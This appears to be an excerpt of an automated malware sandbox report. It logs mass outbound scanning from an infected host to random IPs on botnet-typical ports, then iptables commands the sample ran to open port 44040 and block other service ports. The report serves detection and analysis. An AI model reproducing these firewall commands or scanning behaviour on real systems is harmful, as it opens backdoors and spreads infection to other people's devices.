Source: global traffic TCP traffic: 192.168.2.20:33492 -> 21.71.60.36:52869
Source: global traffic TCP traffic: 192.168.2.20:41634 -> 15.139.248.72:8080
Source: global traffic TCP traffic: 192.168.2.20:59812 -> 52.173.108.207:8080
Source: global traffic TCP traffic: 192.168.2.20:59544 -> 14.27.221.29:8080
Source: global traffic TCP traffic: 192.168.2.20:50294 -> 200.160.26.61:37215
Source: global traffic TCP traffic: 192.168.2.20:58298 -> 117.0.115.227:52869
Source: global traffic TCP traffic: 192.168.2.20:55566 -> 72.204.193.69:37215
Source: global traffic TCP traffic: 192.168.2.20:60458 -> 88.55.10.218:8080
Source: global traffic TCP traffic: 192.168.2.20:55866 -> 173.95.216.55:5555
Source: global traffic TCP traffic: 192.168.2.20:39734 -> 131.6.224.238:8080
Source: global traffic TCP traffic: 192.168.2.20:52616 -> 108.58.115.194:49152
Source: global traffic TCP traffic: 192.168.2.20:58152 -> 217.28.121.124:8080
Source: global traffic TCP traffic: 192.168.2.20:41218 -> 176.24.193.254:7574
Source: global traffic TCP traffic: 192.168.2.20:47630 -> 107.15.195.209:8443
Source: global traffic TCP traffic: 192.168.2.20:37986 -> 132.224.19.35:8080
Source: global traffic TCP traffic: 192.168.2.20:39588 -> 85.4.13.35:52869
Source: global traffic TCP traffic: 192.168.2.20:44530 -> 114.116.30.250:7574
Source: global traffic TCP traffic: 192.168.2.20:44300 -> 13.23.175.71:81
Source: global traffic TCP traffic: 192.168.2.20:40322 -> 209.49.249.153:8443
Source: global traffic TCP traffic: 192.168.2.20:42126 -> 89.192.178.91:37215
Source: global traffic TCP traffic: 192.168.2.20:44606 -> 61.175.55.132:8443
Source: global traffic TCP traffic: 192.168.2.20:54536 -> 167.174.7.212:8080
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 154.18.253.69:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 42.157.134.10:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 108.74.215.207:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 216.157.116.109:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 121.147.101.239:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 191.216.64.228:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.25.8.99:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 210.225.37.119:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 173.191.26.173:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 107.5.252.208:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 180.196.64.7:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 184.90.217.19:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 66.169.135.72:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 153.43.5.52:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 20.10.172.16:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 24.173.204.79:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 40.231.251.18:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 44.125.192.91:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 185.199.252.8:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 202.222.248.221:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 65.76.58.171:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 97.152.241.251:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 92.140.135.135:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 221.79.125.189:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 97.19.93.192:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 112.208.55.3:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 74.181.98.131:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 146.221.115.228:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 147.32.87.2:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 188.213.166.122:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 158.198.126.211:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 221.11.44.192:2323
Source: global traffic TCP traffic: 192.168.2.20:45980 -> 206.215.160.208:8443
Source: global traffic TCP traffic: 192.168.2.20:60230 -> 194.134.230.15:8080
Source: global traffic TCP traffic: 192.168.2.20:33288 -> 168.62.179.106:8080
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 186.129.59.209:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 183.39.114.210:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 69.160.36.31:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 41.208.87.109:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 19.1.83.59:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 189.83.101.94:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 89.211.68.0:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 40.110.214.92:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.48.184.226:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 112.253.107.53:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 12.145.180.4:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 151.11.34.204:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 70.130.42.81:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 4.110.27.220:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 160.227.213.97:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.190.81.26:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 107.61.226.20:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 212.252.174.236:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 12.233.123.43:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 153.192.241.136:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 147.166.248.166:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 223.87.220.29:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 13.152.241.242:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 121.61.31.17:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 63.253.84.254:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 86.185.251.149:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 8.92.251.48:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 211.32.153.82:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 203.0.21.109:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 72.221.8.246:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 202.213.206.179:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 35.117.35.167:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 151.194.99.188:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 212.103.236.147:2323
Source: global traffic TCP traffic: 192.168.2.20:36064 -> 47.145.217.113:5555
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 212.219.62.189:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 206.123.155.195:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 76.92.182.82:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 36.33.205.198:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 38.157.124.234:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 58.155.188.76:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 113.44.78.247:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 97.68.83.8:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 121.99.87.167:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 87.22.241.41:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 178.95.227.170:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 118.211.78.213:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 151.87.97.55:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.66.123.242:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 27.255.154.108:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 176.242.102.183:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 146.35.33.184:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 65.77.77.241:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 219.122.59.104:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 101.118.160.184:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 81.54.132.55:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 175.223.210.199:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 191.15.46.25:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 168.145.68.126:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 38.29.8.84:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 84.255.39.9:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 175.61.243.196:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 100.134.61.27:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 217.93.0.20:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 79.65.71.65:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 20.167.158.223:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 74.118.105.34:2323
Source: global traffic TCP traffic: 192.168.2.20:42434 -> 187.254.232.94:8443
Source: global traffic TCP traffic: 192.168.2.20:43764 -> 207.11.230.122:8080
Source: global traffic TCP traffic: 192.168.2.20:48034 -> 19.134.158.13:8080
Source: global traffic TCP traffic: 192.168.2.20:48348 -> 44.61.11.55:8080
Source: global traffic TCP traffic: 192.168.2.20:48496 -> 178.113.43.27:7574
Source: global traffic TCP traffic: 192.168.2.20:50444 -> 123.219.44.5:81
Source: global traffic TCP traffic: 192.168.2.20:48516 -> 89.233.76.116:8080
Source: global traffic TCP traffic: 192.168.2.20:39274 -> 149.212.141.67:52869
Source: global traffic TCP traffic: 192.168.2.20:50534 -> 211.137.192.96:8080
Source: global traffic TCP traffic: 192.168.2.20:59440 -> 88.201.76.34:7574
Source: global traffic TCP traffic: 192.168.2.20:53588 -> 79.165.147.138:5555
Source: global traffic TCP traffic: 192.168.2.20:35806 -> 37.229.199.107:8443
Source: global traffic TCP traffic: 192.168.2.20:60106 -> 190.174.62.228:7574
Source: global traffic TCP traffic: 192.168.2.20:54834 -> 40.19.224.212:8080
Source: global traffic TCP traffic: 192.168.2.20:59008 -> 196.13.229.215:52869
Source: global traffic TCP traffic: 192.168.2.20:36360 -> 101.193.149.11:81
Source: global traffic TCP traffic: 192.168.2.20:50182 -> 148.157.191.210:49152
Source: global traffic TCP traffic: 192.168.2.20:36990 -> 146.151.247.1:52869
Source: global traffic TCP traffic: 192.168.2.20:37184 -> 173.191.56.106:8080
Source: global traffic TCP traffic: 192.168.2.20:46266 -> 214.0.104.172:52869
Source: global traffic TCP traffic: 192.168.2.20:60148 -> 206.34.195.249:81
Source: global traffic TCP traffic: 192.168.2.20:41632 -> 134.240.237.208:8443
Source: global traffic TCP traffic: 192.168.2.20:50748 -> 221.163.252.68:7574
Source: global traffic TCP traffic: 192.168.2.20:56358 -> 13.176.53.86:52869
Source: global traffic TCP traffic: 192.168.2.20:56030 -> 152.180.2.14:8080
Source: global traffic TCP traffic: 192.168.2.20:34140 -> 3.184.34.149:8443
Source: global traffic TCP traffic: 192.168.2.20:57666 -> 171.141.124.240:8443
Source: global traffic TCP traffic: 192.168.2.20:42454 -> 89.125.164.152:52869
Source: global traffic TCP traffic: 192.168.2.20:49348 -> 193.121.216.28:8080
Source: global traffic TCP traffic: 192.168.2.20:49216 -> 164.154.93.195:8080
Source: global traffic TCP traffic: 192.168.2.20:42866 -> 222.34.74.234:8080
Source: global traffic TCP traffic: 192.168.2.20:36006 -> 18.247.152.131:5555
Source: global traffic TCP traffic: 192.168.2.20:47312 -> 204.170.101.0:37215
Source: global traffic TCP traffic: 192.168.2.20:34394 -> 5.230.135.152:37215
Source: global traffic TCP traffic: 192.168.2.20:39916 -> 118.110.234.130:7574
Source: global traffic TCP traffic: 192.168.2.20:33904 -> 122.25.166.83:52869
Source: global traffic TCP traffic: 192.168.2.20:45598 -> 45.204.245.109:49152
Source: global traffic TCP traffic: 192.168.2.20:56044 -> 147.133.242.76:8080
Source: global traffic TCP traffic: 192.168.2.20:59490 -> 19.118.124.110:7574
Source: global traffic TCP traffic: 192.168.2.20:42346 -> 132.139.233.175:37215
Source: global traffic TCP traffic: 192.168.2.20:59948 -> 117.21.87.201:7574
Source: global traffic TCP traffic: 192.168.2.20:58880 -> 6.243.236.18:8080
Source: global traffic TCP traffic: 192.168.2.20:45762 -> 3.67.142.9:5555
Source: global traffic TCP traffic: 192.168.2.20:41018 -> 70.33.99.104:5555
Source: global traffic TCP traffic: 192.168.2.20:42532 -> 152.100.167.36:8443
Source: global traffic TCP traffic: 192.168.2.20:32890 -> 58.12.204.60:8080
Source: global traffic TCP traffic: 192.168.2.20:32780 -> 4.2.179.224:81
Source: global traffic TCP traffic: 192.168.2.20:54140 -> 196.106.27.28:81
Source: global traffic TCP traffic: 192.168.2.20:52696 -> 123.224.23.253:8080
Source: global traffic TCP traffic: 192.168.2.20:36056 -> 22.193.177.229:52869
Source: global traffic TCP traffic: 192.168.2.20:52546 -> 93.204.44.191:8443
Source: global traffic TCP traffic: 192.168.2.20:51248 -> 35.83.92.160:5555
Source: global traffic TCP traffic: 192.168.2.20:39020 -> 204.121.33.136:49152
Source: global traffic TCP traffic: 192.168.2.20:58310 -> 175.140.231.185:8080
Source: global traffic TCP traffic: 192.168.2.20:39544 -> 133.59.219.177:49152
Source: global traffic TCP traffic: 192.168.2.20:52212 -> 43.25.44.12:7574
Source: global traffic TCP traffic: 192.168.2.20:41908 -> 209.121.184.1:49152
Source: global traffic TCP traffic: 192.168.2.20:53734 -> 219.159.206.231:49152
Source: global traffic TCP traffic: 192.168.2.20:47382 -> 143.190.192.234:81
Source: global traffic TCP traffic: 192.168.2.20:43158 -> 160.205.73.207:5555
Source: global traffic TCP traffic: 192.168.2.20:32832 -> 117.175.62.17:52869
Source: global traffic TCP traffic: 192.168.2.20:43804 -> 180.27.20.9:8443
Source: global traffic TCP traffic: 192.168.2.20:48400 -> 79.46.53.90:5555
Source: global traffic TCP traffic: 192.168.2.20:51920 -> 170.153.165.207:37215
Source: global traffic TCP traffic: 192.168.2.20:52388 -> 25.120.108.166:37215
Source: global traffic TCP traffic: 192.168.2.20:38936 -> 88.143.113.184:37215
Source: global traffic TCP traffic: 192.168.2.20:43268 -> 15.35.59.131:8080
Source: global traffic TCP traffic: 192.168.2.20:44336 -> 44.140.107.144:37215
Source: global traffic TCP traffic: 192.168.2.20:40376 -> 106.57.104.27:8080
Source: global traffic TCP traffic: 192.168.2.20:37816 -> 119.44.94.32:8080
Source: global traffic TCP traffic: 192.168.2.20:58936 -> 222.91.171.102:5555
Source: global traffic TCP traffic: 192.168.2.20:50526 -> 152.99.103.175:81
Source: global traffic TCP traffic: 192.168.2.20:35450 -> 168.17.134.196:8080
Source: global traffic TCP traffic: 192.168.2.20:51626 -> 197.177.18.211:8080
Source: global traffic TCP traffic: 192.168.2.20:56636 -> 196.83.210.30:8443
Source: global traffic TCP traffic: 192.168.2.20:38300 -> 185.155.197.240:81
Source: global traffic TCP traffic: 192.168.2.20:33164 -> 121.26.58.85:49152
Source: global traffic TCP traffic: 192.168.2.20:56170 -> 164.150.9.40:7574
Source: global traffic TCP traffic: 192.168.2.20:39376 -> 51.12.46.124:5555
Source: global traffic TCP traffic: 192.168.2.20:48264 -> 121.149.137.245:8080
Source: global traffic TCP traffic: 192.168.2.20:42412 -> 2.93.191.137:8080
Source: global traffic TCP traffic: 192.168.2.20:41438 -> 189.120.2.56:81
Source: global traffic TCP traffic: 192.168.2.20:50726 -> 177.173.185.50:5555
Source: global traffic TCP traffic: 192.168.2.20:48968 -> 43.219.247.168:7574
Source: global traffic TCP traffic: 192.168.2.20:54234 -> 91.65.28.188:8080
Source: global traffic TCP traffic: 192.168.2.20:51310 -> 177.152.69.68:81
Source: global traffic TCP traffic: 192.168.2.20:52066 -> 65.70.118.43:8080
Source: global traffic TCP traffic: 192.168.2.20:45870 -> 188.24.124.134:49152
Source: global traffic TCP traffic: 192.168.2.20:60646 -> 166.82.7.224:7574
Source: global traffic TCP traffic: 192.168.2.20:42804 -> 217.94.12.32:81
Source: global traffic TCP traffic: 192.168.2.20:45324 -> 31.15.157.79:8080
Source: global traffic TCP traffic: 192.168.2.20:37168 -> 167.68.166.142:8080
Source: global traffic TCP traffic: 192.168.2.20:44994 -> 179.125.55.171:49152
Source: global traffic TCP traffic: 192.168.2.20:53832 -> 212.136.201.1:8080
Source: global traffic TCP traffic: 192.168.2.20:54182 -> 88.151.118.122:49152
Source: global traffic TCP traffic: 192.168.2.20:55594 -> 20.188.249.215:5555
Source: global traffic TCP traffic: 192.168.2.20:51284 -> 29.173.93.82:5555
Source: global traffic TCP traffic: 192.168.2.20:53790 -> 41.225.3.47:8080
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 53.150.184.227:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 66.51.200.37:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 181.150.246.6:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 86.87.169.9:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 135.159.46.50:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 81.122.5.245:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 101.175.97.186:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 201.16.210.127:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 150.231.221.134:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 165.27.212.212:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 35.145.36.100:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 184.123.210.115:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 84.139.204.146:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 210.20.165.119:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 90.245.89.183:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 102.40.194.39:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 117.110.44.183:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.84.203.177:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 145.127.164.51:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 212.60.191.99:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 46.92.49.206:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 90.60.92.48:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 164.125.182.98:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 210.11.149.99:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 68.213.132.158:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 206.141.207.185:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 37.36.151.108:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 99.148.128.207:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 188.2.194.211:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 27.247.199.146:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 148.17.145.65:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 145.224.134.187:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 17.179.66.133:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 94.136.154.153:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 195.153.115.31:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 82.26.125.94:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 148.166.250.32:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 73.60.149.25:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 73.38.107.147:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 46.69.94.69:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 206.45.246.151:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 89.207.33.190:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 211.121.235.206:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 81.181.240.162:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 37.141.143.27:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 37.126.181.96:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 111.71.34.120:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.70.240.234:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 71.90.204.120:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 169.164.54.25:2323
Source: global traffic TCP traffic: 192.168.2.20:32898 -> 54.217.177.252:8080
Source: global traffic TCP traffic: 192.168.2.20:51920 -> 91.128.122.128:7574
Source: global traffic TCP traffic: 192.168.2.20:54630 -> 83.158.11.78:8080
Source: global traffic TCP traffic: 192.168.2.20:50738 -> 219.170.242.188:37215
Source: global traffic TCP traffic: 192.168.2.20:39524 -> 79.209.77.202:49152
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.201.188.204:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 166.40.116.98:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 118.148.44.14:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 5.203.164.245:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 162.139.86.71:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.174.66.76:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 166.38.89.126:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 120.0.30.153:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 178.137.1.177:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 69.68.118.29:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 92.154.174.188:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 184.171.204.218:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 59.250.162.213:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 182.82.125.53:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 121.36.221.166:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 80.18.245.185:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 200.141.44.86:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 97.229.39.239:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 102.53.0.243:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 27.3.146.85:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 36.170.191.82:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.78.202.173:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 201.198.23.60:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 179.131.194.114:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 86.67.177.59:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 13.100.254.46:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 158.118.208.135:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 130.221.150.32:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 177.168.241.5:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 12.59.131.86:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 67.52.33.137:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.64.40.28:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 104.126.166.232:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 57.181.135.64:2323
Source: global traffic TCP traffic: 192.168.2.20:45494 -> 82.194.132.178:49152
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 153.71.86.60:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 89.62.41.91:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 166.24.116.26:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 91.80.195.73:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 158.233.4.149:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 66.162.164.85:2323
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4672) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4679) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4720) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4732) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4755) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4763) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4785) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4815) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4819) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4838) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4866) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4896) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4915) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4939) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4986) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4992) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5015) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5063) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5071) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5095) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5119) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5139) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5158) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5167) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5194) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5215) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5229) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5253) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT Jump to behavior
